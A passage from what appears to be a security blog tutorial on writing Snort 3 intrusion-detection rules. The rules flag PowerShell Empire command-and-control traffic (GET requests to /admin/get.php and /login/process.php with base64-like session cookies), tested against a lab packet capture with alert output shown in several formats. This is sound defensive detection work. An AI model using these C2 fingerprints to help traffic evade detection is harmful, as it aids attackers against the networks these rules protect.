<span style="color: white;">31 EE CA 64 2C 43 50 44 03 A3 51 2D 06 FD 74 49 1..d,CPD ..Q-..tI</span>
<span style="color: white;">A4 68 12 10 4D FF 2E EB 36 3B 1A C7 D2 D9 B1 09 .h..M... 6;......</span>
<span style="color: white;">60 07 30 BB 05 BC 11 B2 3A CB E1 7A 0E F9 72 F6 `.0..... :..z..r.</span>
<span style="color: white;">68 58 E4 B9 64 EB B4 D7 90 0D BD D9 72 A6 D1 A0 hX..d... ....r...</span>
<span style="color: white;">89 99 2D 15 8A A8 04 CB 7D 50 90 3B 4B AC 6F 41 ..-..... }P.;K.oA</span>
<span style="color: white;">--More--</span>
</pre></div>
</div><div><br /></div><div><div>Going back to none service rules. Looking for <i>/admin/get.php</i>.</div><div><br /></div><div>Here is the rule.</div><div><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alert tcp $HOME_NET any -> $EXTERNAL_NET 443</span>
<span style="color: white;"><span> </span>(</span>
<span style="color: white;"> rem: "This rule is looking for Powershell Empire /admin/get.php, hence the 'msg' option";</span>
<span style="color: white;"> msg: "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP method GET. Using the Hex values instead of the string in the first 3 bytes of the payload";</span>
<span style="color: white;"> http_method; </span>
<span style="color: white;"> content: "|47 45 54|", offset 0, depth 3;</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "find the string /news.php in the path. ";</span>
<span style="color: white;"> http_uri: path;</span>
<span style="color: white;"> content: "/admin/get.php", distance 0, within 14, nocase; </span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP Version 1.1";</span>
<span style="color: white;"> http_version: request;</span>
<span style="color: white;"> content: "1.1";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Also look for a cookie that ends with '=', suggesting base64 encoded content";</span>
<span style="color: white;"> http_header: field Cookie;</span>
<span style="color: white;"> regex: "/.*=$/i";</span>
<span style="color: white;"> </span>
<span style="color: white;"> classtype: malware-cnc; </span>
<span style="color: white;"> reference: url, http://www.securitynik.com;</span>
<span style="color: white;"> sid:4000003;</span>
<span style="color: white;"> rev: 10;</span>
<span style="color: white;"><span> </span>)</span>
</pre></div>
</div><div><br /></div><div><div>Here is the result from that rule.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more </span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">11/20-13:05:06.697538 [**] [1:4000003:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected" [**] [Classification: Known malware command and control traffic] [Priority</span>
<span style="color: white;">: 1] {TCP} 10.0.0.110:1650 -> 10.0.0.107:443</span>
<span style="color: white;">http_inspect.http_method[3]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">47 45 54 GET</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_version[8]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">48 54 54 50 2F 31 2E 31 HTTP/1.1 </span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_uri[14]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">2F 61 64 6D 69 6E 2F 67 65 74 2E 70 68 70 /admin/g et.php</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_header[102]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi</span>
<span style="color: white;">6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows</span>
<span style="color: white;">20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 NT 6.1; WOW64; </span>
<span style="color: white;">54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A Trident/ 7.0; rv:</span>
<span style="color: white;">31 31 2E 30 29 20 6C 69 6B 65 20 47 65 63 6B 6F 11.0) li ke Gecko</span>
<span style="color: white;">0D 0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 ..Host: 10.0.0.1</span>
<span style="color: white;">30 37 3A 34 34 33 07:443</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_cookie[36]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">73 65 73 73 69 6F 6E 3D 44 72 70 30 53 78 70 6B session= Drp0Sxpk</span>
<span style="color: white;">54 54 4A 32 62 4B 71 57 30 7A 7A 50 55 56 56 31 TTJ2bKqW 0zzPUVV1</span>
<span style="color: white;">67 32 59 3D g2Y=</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
</pre></div>
</div><div><br /></div><div><div>... and the final rule, looking for <i>/login/process.php</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alert tcp $HOME_NET any -> $EXTERNAL_NET 443</span>
<span style="color: white;"><span> </span>(</span>
<span style="color: white;"> rem: "This rule is looking for Powershell Empire /login/process.php, hence the 'msg' option";</span>
<span style="color: white;"> msg: "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP method GET. Using the Hex values instead of the string in the first 3 bytes of the payload";</span>
<span style="color: white;"> http_method; </span>
<span style="color: white;"> content: "|47 45 54|", offset 0, depth 3;</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "find the string /login/process.php in the path. ";</span>
<span style="color: white;"> http_uri: path;</span>
<span style="color: white;"> content: "/login/process.php", distance 0, within 18, nocase; </span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP Version 1.1";</span>
<span style="color: white;"> http_version: request;</span>
<span style="color: white;"> content: "1.1";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Also look for a cookie that ends with '=', suggesting base64 encoded content";</span>
<span style="color: white;"> http_header: field Cookie;</span>
<span style="color: white;"> content: "session", nocase;</span>
<span style="color: white;"> regex: "/^session.*=$/i";</span>
<span style="color: white;"> </span>
<span style="color: white;"> classtype: malware-cnc; </span>
<span style="color: white;"> reference: url, http://www.securitynik.com;</span>
<span style="color: white;"> sid:4000004;</span>
<span style="color: white;"> rev: 10;</span>
<span style="color: white;"><span> </span>)</span>
</pre></div>
</div><div><br /></div><div><div>Here is what the results look like, when snort is run against the pcap.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">11/20-13:06:06.836488 [**] [1:4000004:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected" [**] [Classification: Known malware command and control traffic] [Prio</span>
<span style="color: white;">rity: 1] {TCP} 10.0.0.110:1650 -> 10.0.0.107:443</span>
<span style="color: white;">http_inspect.http_method[3]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">47 45 54 GET</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_version[8]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">48 54 54 50 2F 31 2E 31 HTTP/1.1 </span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_uri[18]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">2F 6C 6F 67 69 6E 2F 70 72 6F 63 65 73 73 2E 70 /login/p rocess.p</span>
<span style="color: white;">68 70 hp</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_header[102]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi</span>
<span style="color: white;">6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows</span>
<span style="color: white;">20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 NT 6.1; WOW64; </span>
<span style="color: white;">54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A Trident/ 7.0; rv:</span>
<span style="color: white;">31 31 2E 30 29 20 6C 69 6B 65 20 47 65 63 6B 6F 11.0) li ke Gecko</span>
<span style="color: white;">0D 0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 ..Host: 10.0.0.1</span>
<span style="color: white;">30 37 3A 34 34 33 07:443</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">http_inspect.http_cookie[36]:</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
<span style="color: white;">73 65 73 73 69 6F 6E 3D 72 2B 57 77 61 4F 42 61 session= r+WwaOBa</span>
<span style="color: white;">55 4C 50 37 6C 34 37 4B 72 64 68 55 30 41 42 4C ULP7l47K rdhU0ABL</span>
<span style="color: white;">36 49 30 3D 6I0=</span>
<span style="color: white;">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -</span>
</pre></div>
</div><div><br /></div><div><div>Ok. Then good stuff. With all of those in place we can now conclude, we are good to go for this detection. Taking a few different looks at the outputs.</div><div><br /></div><div>First up <i>JSON </i>format.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_json --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more </span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">{ "timestamp" : "11/20-13:03:59.632367", "pkt_num" : 9, "proto" : "TCP", "pkt_gen" : "stream_tcp", "pkt_len" : 164, "dir" : "C2S", "src_ap" : "10.0.0.110:1650", "dst_ap" : "10.0.0.107:443", "rule" : </span>
<span style="color: white;">"1:4000001:10", "action" : "allow" }</span>
<span style="color: white;">{ "timestamp" : "11/20-13:04:02.701119", "pkt_num" : 18, "proto" : "TCP", "pkt_gen" : "stream_tcp", "pkt_len" : 462, "dir" : "C2S", "src_ap" : "10.0.0.110:1650", "dst_ap" : "10.0.0.107:443", "rule" :</span>
<span style="color: white;"> "1:4000002:10", "action" : "allow" }</span>
<span style="color: white;">{ "timestamp" : "11/20-13:05:06.697538", "pkt_num" : 51, "proto" : "TCP", "pkt_gen" : "stream_tcp", "pkt_len" : 148, "dir" : "C2S", "src_ap" : "10.0.0.110:1650", "dst_ap" : "10.0.0.107:443", "rule" :</span>
<span style="color: white;"> "1:4000003:10", "action" : "allow" }</span>
<span style="color: white;">{ "timestamp" : "11/20-13:06:06.836488", "pkt_num" : 58, "proto" : "TCP", "pkt_gen" : "stream_tcp", "pkt_len" : 148, "dir" : "C2S", "src_ap" : "10.0.0.110:1650", "dst_ap" : "10.0.0.107:443", "rule" :</span>
<span style="color: white;"> "1:4000004:10", "action" : "allow" }</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div>Looking at <i>alert fast</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_full --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">[**] [1:4000001:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected" [**]</span>
<span style="color: white;">11/20-13:03:59.632367 </span>
<span style="color: white;">[**] [1:4000002:10] "POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected" [**]</span>
<span style="color: white;">11/20-13:04:02.701119 </span>
<span style="color: white;">[**] [1:4000003:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected" [**]</span>
<span style="color: white;">11/20-13:05:06.697538 </span>
<span style="color: white;">[**] [1:4000004:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected" [**]</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the talos <i>alert_talos </i>...</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_talos --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more </span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">##### empire-full-session.pcap #####</span>
<span style="color: white;"> [1:4000001:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected (alerts: 3)</span>
<span style="color: white;"> [1:4000002:10] POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected (alerts: 3)</span>
<span style="color: white;"> [1:4000003:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected (alerts: 452)</span>
<span style="color: white;"> [1:4000004:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected (alerts: 377)</span>
<span style="color: white;">#####</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the above, I like the <i>alert_talos</i> as it gives me a summary of the alerts, rather than triggering all the alerts to the screen. Good job Talos!</div><div><br /></div><div>Taking a final pass when snort is run without the -q option and with the -v option we see.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_talos --talos --pcap-show -k none -d -R local.rules -c snort.lua -v</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">o")~ Snort++ 3.1.18.0</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Loading snort.lua:</span>
<span style="color: white;">Loading /usr/local/etc/snort/snort_defaults.lua:</span>
<span style="color: white;">Finished /usr/local/etc/snort/snort_defaults.lua:</span>
<span style="color: white;"> Lua Allowlist Keywords for snort.lua:</span>
<span style="color: white;"> default_classifications, default_ftp_server, default_gtp,</span>
<span style="color: white;"> default_hi_port_scan, default_js_norm_built_in_ident, default_low_port_scan,</span>
<span style="color: white;"> default_med_port_scan, default_references, default_smtp, default_variables,</span>
<span style="color: white;"> default_wizard, ftp_command_specs, gtp_v0_info, gtp_v0_msg, gtp_v1_info,</span>
<span style="color: white;"> gtp_v1_msg, gtp_v2_info, gtp_v2_msg, http_methods, icmp_hi_sweep,</span>
<span style="color: white;"> icmp_low_sweep, icmp_med_sweep, ip_hi_decoy, ip_hi_dist, ip_hi_proto,</span>
<span style="color: white;"> ip_hi_sweep, ip_low_decoy, ip_low_dist, ip_low_proto, ip_low_sweep,</span>
<span style="color: white;"> ip_med_decoy, ip_med_dist, ip_med_proto, ip_med_sweep, netflow_versions,</span>
<span style="color: white;"> sip_requests, smtp_default_alt_max_command_lines, tcp_hi_decoy, tcp_hi_dist,</span>
<span style="color: white;"> tcp_hi_ports, tcp_hi_sweep, tcp_low_decoy, tcp_low_dist, tcp_low_ports,</span>
<span style="color: white;"> tcp_low_sweep, tcp_med_decoy, tcp_med_dist, tcp_med_ports, tcp_med_sweep,</span>
<span style="color: white;"> telnet_commands, udp_hi_decoy, udp_hi_dist, udp_hi_ports, udp_hi_sweep,</span>
<span style="color: white;"> udp_low_decoy, udp_low_dist, udp_low_ports, udp_low_sweep, udp_med_decoy,</span>
<span style="color: white;"> udp_med_dist, udp_med_ports, udp_med_sweep</span>
<span style="color: white;"> hosts</span>
<span style="color: white;"> so_proxy</span>
<span style="color: white;"> stream_tcp</span>
<span style="color: white;"> packets</span>
<span style="color: white;"> alerts</span>
<span style="color: white;"> host_tracker</span>
<span style="color: white;"> http_inspect</span>
<span style="color: white;"> binder</span>
<span style="color: white;"> wizard</span>
<span style="color: white;"> stream_ip</span>
<span style="color: white;"> search_engine</span>
<span style="color: white;"> profiler</span>
<span style="color: white;"> ips</span>
<span style="color: white;"> trace</span>
<span style="color: white;"> classifications</span>
<span style="color: white;"> active</span>
<span style="color: white;"> host_cache</span>
<span style="color: white;"> decode</span>
<span style="color: white;"> stream</span>
<span style="color: white;"> process</span>
<span style="color: white;"> output</span>
<span style="color: white;"> network</span>
<span style="color: white;"> daq</span>
<span style="color: white;">Finished snort.lua:</span>
<span style="color: white;">Loading rule args:</span>
<span style="color: white;">Loading local.rules:</span>
<span style="color: white;">Finished local.rules:</span>
<span style="color: white;">Finished rule args:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">rule counts</span>
<span style="color: white;"> total rules loaded: 4</span>
<span style="color: white;"> text rules: 4</span>
<span style="color: white;"> option chains: 4</span>
<span style="color: white;"> chain headers: 2</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">port rule counts</span>
<span style="color: white;"> tcp udp icmp ip</span>
<span style="color: white;"> dst 3 0 0 0</span>
<span style="color: white;"> total 3 0 0 0</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">ips policies rule stats</span>
<span style="color: white;"> id loaded shared enabled file</span>
<span style="color: white;"> 0 4 0 4 snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">service rule counts to-srv to-cli</span>
<span style="color: white;"> http: 4 4</span>
<span style="color: white;"> http2: 4 4</span>
<span style="color: white;"> total: 8 8</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">fast pattern service groups to-srv to-cli</span>
<span style="color: white;"> key: 2 2</span>
<span style="color: white;"> header: 2 2</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">search engine</span>
<span style="color: white;"> instances: 8</span>
<span style="color: white;"> patterns: 16</span>
<span style="color: white;"> pattern chars: 212</span>
<span style="color: white;"> num states: 204</span>
<span style="color: white;"> num match states: 16</span>
<span style="color: white;"> memory scale: KB</span>
<span style="color: white;"> total memory: 14.2461</span>
<span style="color: white;"> pattern memory: 0.824219</span>
<span style="color: white;"> match list memory: 2.09375</span>
<span style="color: white;"> transition memory: 10.3281</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Flow Tracking</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream:</span>
<span style="color: white;"> ip_frags_only: disabled</span>
<span style="color: white;"> max_flows: 476288</span>
<span style="color: white;"> max_aux_ip: 16</span>
<span style="color: white;"> pruning_timeout: 30</span>
<span style="color: white;"> ip_cache: { idle_timeout = 180, cap_weight = 0 }</span>
<span style="color: white;"> tcp_cache: { idle_timeout = 3600, cap_weight = 11000 }</span>
<span style="color: white;"> udp_cache: { idle_timeout = 180, cap_weight = 0 }</span>
<span style="color: white;"> icmp_cache: { idle_timeout = 180, cap_weight = 0 }</span>
<span style="color: white;"> user_cache: { idle_timeout = 180, cap_weight = 0 }</span>
<span style="color: white;"> file_cache: { idle_timeout = 180, cap_weight = 32 }</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Network Policy : policy id 0 : snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Inspection Policy : policy id 0 : snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">binder:</span>
<span style="color: white;"> bindings:</span>
<span style="color: white;"> { when = { proto = tcp, ports = 80 443 },</span>
<span style="color: white;"> use = { type = http_inspect } }</span>
<span style="color: white;"> { when = { service = http },</span>
<span style="color: white;"> use = { type = http_inspect } }</span>
<span style="color: white;"> { when = { },</span>
<span style="color: white;"> use = { type = wizard } }</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">http_inspect:</span>
<span style="color: white;"> request_depth: -1 (unlimited)</span>
<span style="color: white;"> response_depth: -1 (unlimited)</span>
<span style="color: white;"> unzip: enabled</span>
<span style="color: white;"> normalize_utf: enabled</span>
<span style="color: white;"> decompress_pdf: disabled</span>
<span style="color: white;"> decompress_swf: disabled</span>
<span style="color: white;"> decompress_zip: disabled</span>
<span style="color: white;"> decompress_vba: disabled</span>
<span style="color: white;"> script_detection: disabled</span>
<span style="color: white;"> normalize_javascript: disabled</span>
<span style="color: white;">max_javascript_whitespaces: 200</span>
<span style="color: white;"> js_normalization_depth: -1</span>
<span style="color: white;"> js_norm_identifier_depth: 65536</span>
<span style="color: white;"> js_norm_max_tmpl_nest: 32</span>
<span style="color: white;">js_norm_max_bracket_depth: 256</span>
<span style="color: white;"> js_norm_max_scope_depth: 256</span>
<span style="color: white;"> percent_u: disabled</span>
<span style="color: white;"> utf8: enabled</span>
<span style="color: white;"> utf8_bare_byte: disabled</span>
<span style="color: white;"> iis_unicode: disabled</span>
<span style="color: white;"> iis_unicode_code_page: 1252</span>
<span style="color: white;"> iis_double_decode: enabled</span>
<span style="color: white;"> oversize_dir_length: 300</span>
<span style="color: white;"> backslash_to_slash: enabled</span>
<span style="color: white;"> plus_to_space: enabled</span>
<span style="color: white;"> simplify_path: enabled</span>
<span style="color: white;"> xff_headers: x-forwarded-for true-client-ip</span>
<span style="color: white;">request_body_app_detection: enabled</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">so_proxy:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream_ip:</span>
<span style="color: white;"> max_frags: 8192</span>
<span style="color: white;"> max_overlaps: 0</span>
<span style="color: white;"> min_frag_length: 0</span>
<span style="color: white;"> min_ttl: 1</span>
<span style="color: white;"> policy: windows</span>
<span style="color: white;"> session_timeout: 60</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream_tcp:</span>
<span style="color: white;"> flush_factor: 0</span>
<span style="color: white;"> max_pdu: 16384</span>
<span style="color: white;"> max_window: 0</span>
<span style="color: white;"> no_ack: disabled</span>
<span style="color: white;"> overlap_limit: 0</span>
<span style="color: white;"> policy: windows</span>
<span style="color: white;"> queue_limit: { max_bytes = 4194304, max_segments = 3072 }</span>
<span style="color: white;"> reassemble_async: enabled</span>
<span style="color: white;"> require_3whs: 300</span>
<span style="color: white;"> session_timeout: 180</span>
<span style="color: white;"> small_segments: { count = 0, maximum_size = 0 }</span>
<span style="color: white;"> track_only: disabled</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">wizard:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">pcap DAQ configured to read-file.</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">host_cache</span>
<span style="color: white;"> memcap: 8388608 bytes</span>
<span style="color: white;">Commencing packet processing</span>
<span style="color: white;">++ [0] empire-full-session.pcap</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">Instance 0 daq pool size: 256</span>
<span style="color: white;">Instance 0 daq batch size: 64</span>
<span style="color: white;">##### empire-full-session.pcap #####</span>
<span style="color: white;"> [1:4000001:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected (alerts: 3)</span>
<span style="color: white;"> [1:4000002:10] POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected (alerts: 3)</span>
<span style="color: white;"> [1:4000003:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected (alerts: 452)</span>
<span style="color: white;"> [1:4000004:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected (alerts: 377)</span>
<span style="color: white;">#####</span>
<span style="color: white;">-- [0] empire-full-session.pcap</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Packet Statistics</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">daq</span>
<span style="color: white;"> pcaps: 1</span>
<span style="color: white;"> received: 17365</span>
<span style="color: white;"> analyzed: 17365</span>
<span style="color: white;"> allow: 17365</span>
<span style="color: white;"> rx_bytes: 6929587</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">codec</span>
<span style="color: white;"> total: 17365 (100.000%)</span>
<span style="color: white;"> discards: 1610 ( 9.272%)</span>
<span style="color: white;"> eth: 17365 (100.000%)</span>
<span style="color: white;"> ipv4: 17365 (100.000%)</span>
<span style="color: white;"> tcp: 13785 ( 79.384%)</span>
<span style="color: white;"> udp: 1970 ( 11.345%)</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Module Statistics</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">binder</span>
<span style="color: white;"> raw_packets: 3580</span>
<span style="color: white;"> new_flows: 78</span>
<span style="color: white;"> service_changes: 4</span>
<span style="color: white;"> no_match: 4</span>
<span style="color: white;"> inspects: 3658</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">detection</span>
<span style="color: white;"> analyzed: 17365</span>
<span style="color: white;"> key_searches: 1314</span>
<span style="color: white;"> header_searches: 2204</span>
<span style="color: white;"> alerts: 835</span>
<span style="color: white;"> total_alerts: 835</span>
<span style="color: white;"> logged: 835</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">http_inspect</span>
<span style="color: white;"> flows: 25</span>
<span style="color: white;"> scans: 4397</span>
<span style="color: white;"> reassembles: 4399</span>
<span style="color: white;"> inspections: 3956</span>
<span style="color: white;"> requests: 1286</span>
<span style="color: white;"> responses: 464</span>
<span style="color: white;"> get_requests: 1253</span>
<span style="color: white;"> post_requests: 33</span>
<span style="color: white;"> request_bodies: 33</span>
<span style="color: white;"> max_concurrent_sessions: 6</span>
<span style="color: white;"> pipelined_flows: 10</span>
<span style="color: white;"> pipelined_requests: 491</span>
<span style="color: white;"> total_bytes: 898244</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">normalizer</span>
<span style="color: white;"> test_tcp_block: 3</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">search_engine</span>
<span style="color: white;"> max_queued: 2</span>
<span style="color: white;"> total_flushed: 1318</span>
<span style="color: white;"> total_inserts: 1318</span>
<span style="color: white;"> total_unique: 1318</span>
<span style="color: white;"> non_qualified_events: 483</span>
<span style="color: white;"> qualified_events: 835</span>
<span style="color: white;"> searched_bytes: 335622</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream</span>
<span style="color: white;"> flows: 78</span>
<span style="color: white;"> total_prunes: 23</span>
<span style="color: white;"> idle_prunes: 23</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream_tcp</span>
<span style="color: white;"> sessions: 78</span>
<span style="color: white;"> max: 78</span>
<span style="color: white;"> created: 78</span>
<span style="color: white;"> released: 69</span>
<span style="color: white;"> timeouts: 7</span>
<span style="color: white;"> instantiated: 9</span>
<span style="color: white;"> setups: 78</span>
<span style="color: white;"> discards_skipped: 3</span>
